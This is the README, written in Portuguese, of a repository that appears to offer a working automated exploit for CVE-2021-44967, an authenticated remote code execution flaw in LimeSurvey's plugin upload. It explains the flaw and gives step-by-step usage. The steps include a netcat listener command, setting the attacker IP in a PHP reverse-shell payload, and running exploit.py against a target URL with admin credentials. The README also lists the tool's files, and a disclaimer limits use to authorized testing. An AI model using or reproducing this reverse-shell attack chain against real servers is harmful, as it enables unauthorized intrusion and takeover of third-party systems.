
🔥 Exploit de RCE automatizado para Limesurvey (CVE-2021-44967). Cadeia de exploração otimizada para escalada de privilégios. 🚀
Este repositório contém um exploit funcional para CVE-2021-44967, uma vulnerabilidade de Execução Remota de Código autenticada no LimeSurvey.
Testado e confirmado funcionando em:
A vulnerabilidade permite que um usuário autenticado com privilégios administrativos carregue um plugin malicioso. Como o LimeSurvey não valida rigorosamente o conteúdo do ZIP do plugin nem impede a execução de arquivos PHP no diretório do plugin, um atacante pode obter RCE acessando diretamente o shell carregado.
config.xml atualizado para compatibilidade com as versões 3.0 a 6.0 do LimeSurvey.Inicie um listener netcat na sua máquina:
nc -lvnp 443
Edite php-rev.php e defina seu IP local e porta:
$ip = '<YOUR_IP>';
$port = 443;
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>
Exemplo:
python3 exploit.py http://10.129.1.243/survey admin test
exploit.py: O script principal de automação.php-rev.php: Payload de shell reverso PHP.config.xml: Arquivo de configuração obrigatório do plugin LimeSurvey.Esta ferramenta é somente para fins educacionais e testes de segurança autorizados. Destinada estritamente ao uso em ambientes controlados e legais (por exemplo, CTFs, ambientes de laboratório ou engajamentos autorizados). O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta. Use-a com responsabilidade e somente em sistemas nos quais você tenha permissão explícita para testar.